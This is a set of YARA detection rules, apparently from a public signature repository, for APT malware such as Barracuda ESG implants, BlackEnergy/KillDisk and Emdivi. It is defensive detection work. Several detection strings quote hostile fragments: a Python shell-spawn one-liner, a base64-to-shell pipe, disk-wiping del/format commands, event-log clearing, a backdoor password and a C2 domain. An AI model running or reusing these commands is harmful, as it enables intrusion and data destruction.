description = "Detects agent used as proxy tool in UNC4841 intrusions - possibly Alchemist C2 framework implant"
author = "Florian Roth"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
date = "2023-06-16"
score = 75
hash1 = "ca72fa64ed0a9c22d341a557c6e7c1b6a7264b0c4de0b6f717dd44bddf550bca"
hash2 = "57e4b180fd559f15b59c43fb3335bd59435d4d76c4676e51a06c6b257ce67fb2"
id = "0e406737-3083-53c2-a6d2-14c07794125a"
strings:
//$a1 = "Go build" // not available in all samples
$a2 = "/src/runtime/panic.go"
$s1 = "main.handleClientRequest" ascii fullword
$s2 = "main.sockIP.toAddr" ascii fullword
// $s3 = "main.slave" ascii fullword
condition:
(
uint16(0) == 0x5a4d // Windows PE
or uint32be(0) == 0x7f454c46 // ELF
or uint16(0) == 0xfeca or uint16(0) == 0xfacf or uint32(0) == 0xbebafeca or uint32(0) == 0xbebafeca // MacOS
)
and filesize < 10MB
and all of them
}
rule SUSP_FScan_Port_Scanner_Output_Jun23 : SCRIPT {
meta:
description = "Detects output generated by the command line port scanner FScan"
author = "Florian Roth"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
date = "2023-06-15"
score = 70
id = "7eb4b27f-0c5b-5d7e-b759-95d7894d5822"
strings:
$s1 = "[*] NetInfo:" ascii
$s2 = ":443 open" ascii
$s3 = " [->]"
condition:
filesize < 800KB and all of them
}
rule SUSP_PY_Shell_Spawn_Jun23_1 : SCRIPT {
meta:
description = "Detects suspicious one-liner to spawn a shell using Python"
author = "Florian Roth"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
date = "2023-06-15"
score = 70
id = "15fd2c9a-c425-5d4d-9209-fd3826074d6c"
strings:
$x1 = "python -c import pty;pty.spawn(\"/bin/" ascii
condition:
1 of them
}
/* Mandiant Rules */
/* Source: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally */
rule APT_MAL_Hunting_LUA_SEASIDE_1 {
meta:
description = "Hunting rule looking for strings observed in SEASIDE samples."
author = "Mandiant"
date = "2023-06-15"
score = 70
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
hash = "cd2813f0260d63ad5adf0446253c2172"
id = "86eaff7b-4ca0-53cd-8886-da66a36c778f"
strings:
$s1 = "function on_helo()"
$s2 = "local bindex,eindex = string.find(helo,'.onion')"
$s3 = "helosend = 'pd'..' '..helosend"
$s4 = "os.execute(helosend)"
condition:
filesize < 1MB and all of ($s*)
}
rule APT_MAL_LNX_Hunting_Linux_WHIRLPOOL_1 {
meta:
description = "Hunting rule looking for strings observed in WHIRLPOOL samples."
author = "Mandiant"
date = "2023-06-15"
score = 70
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
hash = "177add288b289d43236d2dba33e65956"
id = "a997bd65-c502-53a0-8bb8-62daaa916f0d"
strings:
$s1 = "error -1 exit" fullword
$s2 = "create socket error: %s(error: %d)\n" fullword
$s3 = "connect error: %s(error: %d)\n" fullword
$s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
$c1 = "plain_connect" fullword
$c2 = "ssl_connect" fullword
$c3 = "SSLShell.c" fullword
condition:
uint32(0) == 0x464c457f and filesize < 15MB and (all of ($s*) or all of ($c*))
}
rule APT_MAL_LUA_Hunting_SKIPJACK_1 {
meta:
author = "Mandiant"
date = "2023-06-15"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
description = "Hunting rule looking for strings observed in SKIPJACK installation script."
hash = "e4e86c273a2b67a605f5d4686783e0cc"
score = 70
id = "0026375c-7f37-5ef9-bd55-5b9fc499e5d2"
strings:
$str1 = "hdr:name() == 'Content-ID'" base64
$str2 = "hdr:body() ~= nil" base64
$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
$str4 = "openssl aes-256-cbc" base64
$str5 = "mod_content.lua"
$str6 = "#!/bin/sh"
condition:
all of them
}
rule APT_MAL_LUA_Hunting_Lua_SKIPJACK_2 {
meta:
author = "Mandiant"
date = "2023-06-15"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
description = "Hunting rule looking for strings observed in SKIPJACK samples."
hash = "87847445f9524671022d70f2a812728f"
score = 70
id = "e1eac294-fe60-5bb2-bae4-0f7bcbe6b1db"
strings:
$str1 = "hdr:name() == 'Content-ID'"
$str2 = "hdr:body() ~= nil"
$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
$str4 = "openssl aes-256-cbc"
$str5 = "| base64 -d| sh 2>"
condition:
all of them
}
rule APT_MAL_LUA_Hunting_Lua_SEASPRAY_1 {
meta:
author = "Mandiant"
date = "2023-06-15"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
description = "Hunting rule looking for strings observed in SEASPRAY samples."
hash = "35cf6faf442d325961935f660e2ab5a0"
score = 70
id = "8c744b85-b61e-56d0-8a9e-ae6a954e1b95"
strings:
$str1 = "string.find(attachment:filename(),'obt075') ~= nil"
$str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
$str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"
condition:
all of them
}

View file

@ -0,0 +1,31 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-05-12
Identifier:
*/
/* Rule Set ----------------------------------------------------------------- */
rule BeepService_Hacktool {
meta:
description = "Detects BeepService Hacktool used by Chinese APT groups"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/p32Ozf"
date = "2016-05-12"
score = 85
hash1 = "032df812a68852b6f3822b9eac4435e531ca85bdaf3ee99c669134bd16e72820"
hash2 = "e30933fcfc9c2a7443ee2f23a3df837ca97ea5653da78f782e2884e5a7b734f7"
hash3 = "ebb9c4f7058e19b006450b8162910598be90428998df149977669e61a0b7b9ed"
hash4 = "6db2ffe7ec365058f9d3b48dcca509507c138f19ade1adb5f13cf43ea0623813"
id = "8813a01a-10db-52e7-bb1e-322864e87b15"
strings:
$x1 = "\\\\%s\\admin$\\system32\\%s" fullword ascii
$s1 = "123.exe" fullword ascii
$s2 = "regclean.exe" fullword ascii
$s3 = "192.168.88.69" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and $x1 and 1 of ($s*)
}

View file

@ -0,0 +1,224 @@
rule dubseven_file_set
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for service files loading UP007"
id = "5b0a9cb9-aeef-5508-8854-51ad846b22c5"
strings:
$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
$file7 = "\\Microsoft\\Internet Explorer\\mon"
$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
//Just a few of these as they differ
3 of ($file*)
}
rule dubseven_dropper_registry_checks
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for registry keys checked for by the dropper"
id = "8369cdbb-53b8-5dc5-9181-fd49747042a7"
strings:
$reg1 = "SOFTWARE\\360Safe\\Liveup"
$reg2 = "Software\\360safe"
$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
$reg4 = "SOFTWARE\\Avira\\Avira Destop"
$reg5 = "SOFTWARE\\rising\\RAV"
$reg6 = "SOFTWARE\\JiangMin"
$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
all of ($reg*)
}
rule dubseven_dropper_dialog_remains
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for related dialog remnants. How rude."
id = "6029ea74-26fc-57d1-aaed-be1ea2138844"
strings:
$dia1 = "fuckMessageBox 1.0" wide
$dia2 = "Rundll 1.0" wide
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
any of them
}
rule maindll_mutex
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Matches on the maindll mutex"
id = "7a89dae3-9e03-5803-9729-78e6e65e91d3"
strings:
$mutex = "h31415927tttt"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$mutex
}
rule SLServer_dialog_remains
{
meta:
author = "Matt Brooks, @cmatthewbrooks / modified by Florian Roth"
date = "2016/04/18"
score = 75
description = "Searches for related dialog remnants."
id = "cf199d25-ce5e-52c2-88de-32a48dee4c6f"
strings:
$slserver = "SLServer" wide fullword
$fp1 = "Dell Inc." wide fullword
$fp2 = "ScriptLogic Corporation" wide
$extra1 = "SLSERVER" wide fullword
$extra2 = "\\SLServer.pdb" ascii
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
// Reduce false positives
not 1 of ($fp*) and
1 of ($extra*) and
$slserver
}
rule SLServer_mutex
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for the mutex."
id = "decdefd0-fe20-5adf-9d8c-0e2b954481a0"
strings:
$mutex = "M&GX^DSF&DA@F"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$mutex
}
rule SLServer_command_and_control
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for the C2 server."
id = "e4fcda6c-1c9f-5b58-8b07-8d1a0dc4eaf6"
strings:
$c2 = "safetyssl.security-centers.com"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$c2
}
rule SLServer_campaign_code
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for the related campaign code."
id = "672f506e-0cc1-5b09-873b-c3d206486bac"
strings:
$campaign = "wthkdoc0106"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$campaign
}
rule SLServer_unknown_string
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
date = "2016/04/18"
score = 75
description = "Searches for a unique string."
id = "00341604-480f-59aa-9c18-009e7b53928e"
strings:
$string = "test-b7fa835a39"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$string
}

View file

@ -0,0 +1,51 @@
import "pe"
rule APT_ME_BigBang_Gen_Jul18_1 {
meta:
description = "Detects malware from Big Bang campaign against Palestinian authorities"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
date = "2018-07-09"
hash1 = "4db68522600f2d8aabd255e2da999a9d9c9f1f18491cfce9dadf2296269a172b"
hash2 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
hash3 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
id = "f1097998-9414-511c-b177-ff09154964a8"
strings:
$x2 = "%@W@%S@c@ri%@p@%t.S@%he@%l%@l" ascii
$x3 = "S%@h%@e%l%@l." ascii
$x4 = "(\"S@%t@%a%@rt%@up\")" ascii
$x5 = "aW5zdGFsbCBwcm9nOiBwcm9nIHdpbGwgZGVsZXRlIG9sZCB0bXAgZmlsZQ==" fullword ascii /* base64 encoded string 'install prog: prog will delete old tmp file' */
$x6 = "aW5zdGFsbCBwcm9nOiBUaGVyZSBpcyBubyBvbGQgZmlsZSBpbiB0ZW1wLg==" fullword ascii /* base64 encoded string 'install prog: There is no old file in temp.' */
$x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii /* base64 encoded string 'Update prog: There is no old file in temp.' */
$x8 = "aW5zdGFsbCBwcm9nOiBDcmVhdGUgVGFzayBhZnRlciA1IG1pbiB0byBydW4gRmlsZSBmcm9tIHRtcA==" fullword ascii /* base64 encoded string 'install prog: Create Task after 5 min to run File from tmp' */
$x9 = "UnVuIEZpbGU6IE15IHByb2cgaXMgRXhpdC4=" fullword ascii /* base64 encoded string 'Run File: My prog is Exit.' */
$x10 = "li%@%@nk.W%@%@indo@%%@%@%wS%@%@tyle = 3" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and (
1 of them or
pe.imphash() == "0f09ea2a68d04f331df9a5d0f8641332"
)
}
rule APT_ME_BigBang_Mal_Jul18_1 {
meta:
description = "Detects malware from Big Bang report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
date = "2018-07-09"
hash1 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
hash2 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
id = "f30b2e11-f90a-5068-8eaa-25f11218ec6c"
strings:
$s1 = "%Y%m%d-%I-%M-%S" fullword ascii
$s2 = "/api/serv/requests/%s/runfile/delete" fullword ascii
$s3 = "\\part.txt" ascii
$s4 = "\\ALL.txt" ascii
$s5 = "\\sat.txt" ascii
$s6 = "runfile.proccess_name" fullword ascii
$s7 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and 4 of them
}

View file

@ -0,0 +1,21 @@
rule EXT_APT_Bitter_Win32k_0day_Feb21 {
meta:
description = "Detects code that exploits a Windows 0day exploited by Bitter APT group"
author = "dbappsecurity_lieying_lab"
date = "2021-01-01"
reference = "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/"
id = "b1892b52-4b94-5571-ad63-8750a321f1f2"
strings:
$s1 = "NtUserConsoleControl" ascii wide
$s2 = "NtCallbackReturn" ascii wide
$s3 = "CreateWindowEx" ascii wide
$s4 = "SetWindowLong" ascii wide
$a1 = {48 C1 E8 02 48 C1 E9 02 C7 04 8A}
$a2 = {66 0F 1F 44 00 00 80 3C 01 E8 74 22 FF C2 48 FF C1}
$a3 = {48 63 05 CC 69 05 00 8B 0D C2 69 05 00 48 C1 E0 20 48 03 C1}
condition:
uint16(0) == 0x5a4d and all of ($s*) and 1 of ($a*)
}

View file

@ -0,0 +1,188 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2015-02-19
Identifier: BlackEnergy Malware
*/
rule BlackEnergy_BE_2 {
meta:
description = "Detects BlackEnergy 2 Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/DThzLz"
date = "2015/02/19"
hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
id = "c93991b9-77e8-5a73-80ef-e21df770c3a5"
strings:
$s0 = "<description> Windows system utility service </description>" fullword ascii
$s1 = "WindowsSysUtility - Unicode" fullword wide
$s2 = "msiexec.exe" fullword wide
$s3 = "WinHelpW" fullword ascii
$s4 = "ReadProcessMemory" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and all of ($s*)
}
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-01-03
Identifier: BlackEnergy Malware
*/
rule BlackEnergy_VBS_Agent {
meta:
description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
date = "2016-01-03"
hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
id = "0876f752-d476-5706-918e-edfda9bd7928"
strings:
$s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
$s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
$s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii /* Goodware String - occured 1 times */
condition:
filesize < 1KB and 2 of them
}
rule DropBear_SSH_Server {
meta:
description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
date = "2016-01-03"
score = 50
hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
id = "22595d8b-b7ea-570e-ad17-d5bcec613abf"
strings:
$s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
$s2 = "Badly formatted command= authorized_keys option" fullword ascii
$s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
$s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
$s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
}
rule BlackEnergy_BackdoorPass_DropBear_SSH {
meta:
description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
date = "2016-01-03"
hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
id = "60db00dd-72b3-5a28-90de-2a397b1e007b"
strings:
$s1 = "passDs5Bu9Te7" fullword ascii
condition:
uint16(0) == 0x5a4d and $s1
}
/* Super Rules ------------------------------------------------------------- */
rule BlackEnergy_KillDisk_1 {
meta:
description = "Detects KillDisk malware from BlackEnergy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
date = "2016-01-03"
score = 80
super_rule = 1
hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
id = "304e7aa3-48d3-5015-aaf1-6b1df2441b75"
strings:
$s0 = "system32\\cmd.exe" fullword ascii
$s1 = "system32\\icacls.exe" fullword wide
$s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
$s3 = "shutdown /r /t %d" fullword ascii
$s4 = "/C /Q /grant " fullword wide
$s5 = "%08X.tmp" fullword ascii
$s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
$s7 = "/c format %c: /Y /Q" fullword ascii
$s8 = "taskhost.exe" fullword wide /* Goodware String - occured 1 times */
$s9 = "shutdown.exe" fullword wide /* Goodware String - occured 1 times */
condition:
uint16(0) == 0x5a4d and filesize < 500KB and 8 of them
}
rule BlackEnergy_KillDisk_2 {
meta:
description = "Detects KillDisk malware from BlackEnergy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
date = "2016-01-03"
modified = "2023-01-06"
score = 80
super_rule = 1
hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
id = "f0304e87-a278-5963-9af0-935c088c00ec"
strings:
$s0 = "%c:\\~tmp%08X.tmp" fullword ascii
$s1 = "%s%08X.tmp" fullword ascii
$s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
$s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 500KB and 3 of them
}
rule BlackEnergy_Driver_USBMDM {
meta:
description = "Black Energy Driver"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
date = "2016-01-04"
super_rule = 1
hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
id = "d5e8faf0-38cb-5193-b859-83ea09278011"
strings:
$s1 = "USB MDM Driver" fullword wide
$s2 = "KdDebuggerNotPresent" fullword ascii /* Goodware String - occured 50 times */
$s3 = "KdDebuggerEnabled" fullword ascii /* Goodware String - occured 69 times */
condition:
uint16(0) == 0x5a4d and filesize < 180KB and all of them
}
rule BlackEnergy_Driver_AMDIDE {
meta:
description = "Black Energy Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
date = "2016-01-04"
super_rule = 1
hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
id = "e5b57c33-87f7-5411-995c-384e0afa0348"
strings:
$s1 = " AMD IDE driver" fullword wide
$s2 = "SessionEnv" fullword wide
$s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
$s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
condition:
uint16(0) == 0x5a4d and filesize < 150KB and all of them
}

View file

@ -0,0 +1,16 @@
rule blackenergy3_installer
{
meta:
author = "Mike Schladt"
date = "2015-05-29"
description = "Matches unique code block for import name construction "
md5 = "78387651DD9608FCDF6BFB9DF8B84DB4"
sha1 = "78636F7BBD52EA80D79B4E2A7882403092BBB02D"
reference = "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
id = "4afeb7ac-ce8d-506c-9c97-db7ec6102490"
strings:
$import_names = { C7 45 D0 75 73 65 72 C7 45 D4 33 32 2E 64 66 C7 45 D8 6C 6C 88 5D DA C7 45 84 61 64 76 61 C7 45 88 70 69 33 32 C7 45 8C 2E 64 6C 6C 88 5D 90 C7 45 B8 77 69 6E 69 C7 45 BC 6E 65 74 2E C7 45 C0 64 6C 6C 00 C7 45 C4 77 73 32 5F C7 45 C8 33 32 2E 64 66 C7 45 CC 6C 6C 88 5D CE C7 45 94 73 68 65 6C C7 45 98 6C 33 32 2E C7 45 9C 64 6C 6C 00 C7 45 E8 70 73 61 70 C7 45 EC 69 2E 64 6C 66 C7 45 F0 6C 00 C7 85 74 FF FF FF 6E 65 74 61 C7 85 78 FF FF FF 70 69 33 32 C7 85 7C FF FF FF 2E 64 6C 6C 88 5D 80 C7 85 64 FF FF FF 6F 6C 65 61 C7 85 68 FF FF FF 75 74 33 32 C7 85 6C FF FF FF 2E 64 6C 6C 88 9D 70 FF FF FF C7 45 DC 6F 6C 65 33 C7 45 E0 32 2E 64 6C 66 C7 45 E4 6C 00 C7 45 A0 76 65 72 73 C7 45 A4 69 6F 6E 2E C7 45 A8 64 6C 6C 00 C7 85 54 FF FF FF 69 6D 61 67 C7 85 58 FF FF FF 65 68 6C 70 C7 85 5C FF FF FF 2E 64 6C 6C 88 9D 60 FF FF FF C7 45 AC 61 70 70 68 C7 45 B0 65 6C 70 2E C7 45 B4 64 6C 6C 00 C7 45 F4 2E 64 6C 6C 88 5D F8 }
condition :
any of them
}

View file

@ -0,0 +1,143 @@
/*
Yara Rule Set
Author: Florian Roth @Cyber0ps
Date: 2015-08-20
Identifier: Emdivi
*/
rule Emdivi_SFX {
meta:
description = "Detects Emdivi malware in SFX Archive"
author = "Florian Roth (Nextron Systems) @Cyber0ps"
reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
date = "2015-08-20"
score = 70
hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
id = "51367190-2e8d-507c-a19f-996bc6960977"
strings:
$x1 = "Setup=unsecess.exe" fullword ascii
$x2 = "Setup=leassnp.exe" fullword ascii
$s1 = "&Enter password for the encrypted file:" fullword wide
$s2 = ";The comment below contains SFX script commands" fullword ascii
$s3 = "Path=%temp%" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 740KB and (1 of ($x*) and all of ($s*))
}
/* Super Rules ------------------------------------------------------------- */
rule Emdivi_Gen1 {
meta:
description = "Detects Emdivi Malware"
author = "Florian Roth (Nextron Systems) @Cyber0ps"
reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
date = "2015-08-20"
score = 80
super_rule = 1
hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
id = "807cf3f9-4f58-5d22-88b2-9adb7866979f"
strings:
$x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
$x2 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
$x3 = "userControl-v80.exe" fullword ascii
$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
$s2 = "http://www.msftncsi.com" fullword wide
$s3 = "net use | find /i \"c$\"" fullword wide
$s4 = " /del /y & " fullword wide
$s5 = "\\auto.cfg" wide
$s6 = "/ncsi.txt" fullword wide
$s7 = "Dcmd /c" fullword wide
$s8 = "/PROXY" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 800KB and all of them
}
rule Emdivi_Gen2 {
meta:
description = "Detects Emdivi Malware"
author = "Florian Roth (Nextron Systems) @Cyber0ps"
reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
date = "2015-08-20"
modified = "2023-01-27"
super_rule = 1
score = 80
hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
id = "9a77c85c-84b0-5e0f-93bc-e17e2aaec095"
strings:
$s1 = "%TEMP%\\IELogs\\" ascii
$s2 = "MSPUB.EXE" fullword ascii
$s3 = "%temp%\\" ascii
$s4 = "\\NOTEPAD.EXE" ascii
$s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
$s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
$s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1300KB and 6 of them
}
rule MAL_Emdivi_Gen3 {
meta:
description = "Detects Emdivi Malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
date = "2015-08-20"
